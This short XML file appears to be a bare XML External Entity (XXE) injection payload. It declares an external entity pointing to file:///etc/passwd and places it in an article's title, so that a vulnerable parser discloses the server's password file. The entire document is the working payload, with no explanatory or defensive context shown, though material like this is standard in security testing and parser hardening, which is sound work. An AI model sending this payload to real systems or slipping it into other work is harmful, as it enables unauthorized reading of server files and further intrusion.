<?xml version="1.0"?>
<!DOCTYPE article [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<article>
  <title>&xxe;</title>
</article>
